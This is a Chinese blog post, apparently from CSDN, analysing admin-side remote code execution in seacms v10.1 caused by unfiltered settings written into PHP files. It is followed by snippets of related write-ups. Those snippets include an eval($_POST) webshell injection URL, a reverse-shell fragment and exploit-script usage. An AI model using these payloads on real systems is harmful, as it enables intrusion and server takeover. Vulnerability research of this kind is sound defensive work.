seacms v10.1后台多处RCE 分析

最新推荐文章于 2025-03-03 20:00:19 发布
原创 最新推荐文章于 2025-03-03 20:00:19 发布 · 686 阅读 · 2 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#web安全 #代码审计

seacms v10.1后台多处RCE

漏洞详情

seacms多处存在RCE,原因都是对传入的参数未经过滤直接写入文件中执行造成的。

漏洞分析

1、后台IP安全设置处RCE

这里可以开启或关闭IP安全设置并可以指定ip,通过$v$ip参数完成设置
在这里插入图片描述
这是是将设置参数值写入data/admin/ip.php文件,完成设置

在这里插入图片描述

并且直接传入的参数拼接写入文件,没有任何过滤

在这里插入图片描述

这里构造耀执行的代码时,需要注意闭合前面的语句和注释后面的引号

在这里插入图片描述

2、后台微信公众号设置处RCE

这里也是同样的原因,没有过滤就直接写入文件

最低0.47元/天 解锁文章
SeaCMS海洋影视管理系统 index.php SQL注入
iSee857的博客
08-24 912
海洋CMS是一套专为不同需求的站长而设计的内容管理系统,灵活、方便、人性化设计、简单易用是最大的特色,可快速建立一个海量内容的专业网站。海洋CMS基于PHP+MySql技术开发,完全开源免费 、无任何加密代码。在index.php中存在SQL注入,导致未授权攻击者可利用该漏洞获取隐私数据。该漏洞已支持yakit插件检测,根据uuid 1ab73e21-fc16-4801-9588-3bbae2ad1418 进行下载。在Web应用防火墙中添加接口临时黑名单规则。
SeaCMS V9海洋影视管理系统报错注入
weixin_73921499的博客
02-24 562
SQL 注入攻击是当前网络安全中最常见的一种攻击方式,攻击者可以利用该漏洞访问或操作数据库,造成数据泄露或破坏。在 SeaCMS V9 中,用户输入(如登录、评论、分页、ID 等)未经过适当的验证和清理,直接嵌入到 SQL 查询中,导致了 SQL 注入攻击的发生。变量没有经过适当的验证或清理,可以通过修改这些参数来执行恶意的 SQL 查询,从而导致 SQL 注入攻击。是由用户输入的,并且没有经过验证或过滤,可以传递恶意的输入来执行 SQL 注入攻击。变量直接用于 SQL 查询,如果。
seacms漏洞
最新发布
2201_75544326的博客
03-03 469
海洋影视管理系统(seacms,海洋cms)是一套专为不同需求的站长而设计的视频点播系统,采用的是 php5.X+mysql 的架构,seacmsv9漏洞文件:./comment/api/index.php,漏洞参数:$rlist。
Seacms代码审计小结(后台多处getshell)1
08-03
在框架中,有很多是写的是以 txt 结尾的件,这种直接读是法以 php 来解析,但是如果找到处件包含的漏洞,让他包含的是这种我们可以修改的件,那就也可以造成代码
Seacms最新版本注入实战+后台RCE成功getshell-2018年老文章
J0o1ey Blog
06-21 6948
有技术培训需求/技术交流/代码审计需求/的朋友可以联系QQ547006660 0X001海洋CMS简介# 海洋cms是为解决站长核心需求而设计的视频内容管理系统,一套程序自适应电脑、手机、平板、APP多个终端入口,无任何加密代码、安全有保障,是您最佳的建站工具。——来自seacms官网(简而言之就是专门搭建看片网站的cms) 呵呵,安全有保障??头都给你打爆掉,百度搜索seacms。。漏洞信息...
seacms_v6.4(海洋cms)前台RCE 分析
RestoreJustice的博客
03-19 1980
在common.php中对GET,POST,COOKIE等请求传入的全局变量中的键值对转换成变量,并对其中的值使用addslashes()转义预定义的特殊符号。在eval()函数中,首先要闭合前面的if语句,可以构造1)phpinfo();首先search.php入手,这个文件包含了common.php和main.class.php。参数没做严格的限制,就将其传入了模板文件中,然后使用eval()执行模板中包含。的代码,通过闭合拼接语句的方式,插入恶意代码,实现远程命令执行。在eval()函数中,
74CMS_v5.0.1后台RCE分析1
08-03
【74CMS_v5.0.1后台RCE分析】主要涉及的是74CMS内容管理系统的一个远程代码执行(Remote Code Execution, RCE)漏洞。这个漏洞发生在系统的后台管理部分,需要用户具有管理员权限才能利用。漏洞的触发点在于系统允许...
LightCMS全版本后台RCE 0day分析1
08-03
【LightCMS全版本后台RCE 0day分析1】这篇技术文章主要探讨了一个针对LightCMS的严重漏洞,该漏洞允许远程代码执行(RCE)通过Phar反序列化机制。LightCMS是一款基于Laravel框架的Content Management System(CMS)...
[0day]通达 OA v11.7 后台 SQL 注入到 RCE1
08-03
通达 OA v11.7 后台 SQL 注入到 RCE 通达 OA v11.7 版本存在后台 SQL 注入漏洞,攻击者可以通过构造特殊的 SQL 语句,绕过安全机制,获取数据库权限,并最终获得远程代码执行(RCE)权限。 知识点一:SQL 注入漏洞...
漏洞解决办法是_SEACMS 代码审计后台漏洞两则
weixin_39960793的博客
01-14 301
本文作者:ZiNG(信安之路核心成员)特殊时期在家都无聊死了,到 CNVD 的网站上看到 seacms 出了一个鸡肋后台的 SQL 注入。想来闲来无事,就下载一套源码看看。漏洞成因很简单很简单,那为啥又要有这篇呢,只是记一下漏洞点,没准以后用的上。漏洞定位根据 CNVD 公开出来的描述,以及参照源码的目录结构,漏洞点是在 admin\admin_pay.php。说明一下,在程序安装完成后...
Umbraco-RCE:Umbraco CMS 7.12.4-(已认证)远程执行代码
03-21
Umbraco RCE漏洞利用/ PoC Umbraco CMS 7.12.4-(已认证)远程执行代码 [ ] [ ] 用法 $ python exploit.py -h usage: exploit.py [-h] -u USER -p PASS -i URL -c CMD [-a ARGS] Umbraco authenticated RCE optional arguments: -h, --help show this help message and exit -u USER, --user USER username / email -p PASS, --password PASS password -i URL, --host URL root URL -c CMD, --comman
zabbix后台RCE
weixin_44508748的博客
11-24 1671
vulhub有现成的zabbix环境 git clone --depth=1 https://github.com.cnpmjs.org/vulhub/vulhub.git cd vulhub/zabbix/CVE-2016-10134/ docker-compose up -d zabbix默认口令admin\zabbix 1.写脚本 http://1.1.1.1/zabbix/zabbix.php?action=script.edit&scriptid=4 bash -i>&
PublicCMS 后台模块 站点执行脚本RCE漏洞
shelter1234567的博客
03-22 1282
PublicCMS是采用2023年主流技术开发的开源JAVACMS系统。由天津黑核科技有限公司开发,架构科学,轻松支撑上千万数据、千万PV;支持可视化编辑,多维扩展,全文搜索,全站静态化,SSI,动态页面局部静态化,URL规则完全自定义等为您快速建站,建设大规模站点提供强大驱动,也是企业级项目产品原型的良好选择。项目地址。
CVE-2020-21378(seacms后台SQL注入) 分析
RestoreJustice的博客
03-16 1670
变量没有经过什么过滤就直接插入到SQL语句中(360webscan.php会使用正则规则对注册的变量会进行检查,但对$id并没有任何检查),也没有引号包裹,十分好利用。在seacms v10.1版本中,在sql.class.php中GetOne中加入了对SQL语句的安全检查(上面的注入语句这里用不了)绕过方法参考https://xz.aliyun.com/t/2828#toc-3。下面这里的这个检查与先前审计过的duomicms的检查函数一样,是以单引号为界,把第一个引号前的语句给。
CVE-2021-40904——CheckMk后台RCE
热门推荐
LiBai'S BLOG
04-10 1万+
CVE-2021-40904 漏洞描述 CheckMk Raw Edition(版本 1.5.0 到 1.5.0p25)的 Web 管理控制台允许错误配置允许嵌入 php 代码的 Web 应用程序 Dokuwiki(默认安装)。结果,实现了远程代码执行。成功的利用需要使用有效凭据或具有管理员角色的用户劫持会话来访问 Web 管理界面。 影响版本 从 1.5.0 到 1.5.0p25 攻击类型 RCE 解决方案 升级到 1.6 或更高版本 时间线 2021-09-01 发现问题。 2021-09-06 第
Seacms
haha1314的博客
07-15 731
Payload1: http://192.168.88.147/sea/upload/search.php?searchtype=5&tid=&area=eval($_POST[123]) Payload2:只有读取权没有写入权限 http://192.168.88.147/sea/upload/search.php?searchtype=5&searchword={i...
seacms admin_ip.php RCE (CVE-2022-48093) 漏洞复现
weixin_68999845的博客
07-31 814
改内容写入的是 .php 文件内的,观察请求的payload是否是恶意的php语句,分析其作用,在本地测试即可(若写入一句话木马,用antswords连接.php文件观察是否成功即可)1.下载源码到本地:https://github.com/seacms-com/seacms1.登录后台(在配置环境时,后台地址时随机生成的,本次地址为:seacms-master/源码下载url:https://github.com/seacms-com/seacms。以下版本受该漏洞影响:seacms全版本。
JD-FreeFuck 后台RCE漏洞
weixin_51387754的博客
11-05 9480
漏洞简介 RCE英文全称:remote command/code execute 分为远程命令执行ping和远程代码执行evel。 漏洞出现的原因:没有在输入口做输入处理。 我们常见的路由器、防火墙、入侵检测等设备的web管理界面上 一般会给用户提供一个ping操作的web界面,用户从web界面输入目标IP,提交后,后台会对该IP地址进行一次ping测试,并返回测试结果。其实这就是一个接口,可以让攻击者直接向后台服务器远程注入操作系统命令或者代码,从而控制后台系统,这就是RCE漏洞。 漏洞复现 fofa语法
WEB 漏洞:seacms 远程命令执行(CNVD-2020-22721
2301_79118231的博客
10-27 883
注:个人笔记,并不全面,仅供参考。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值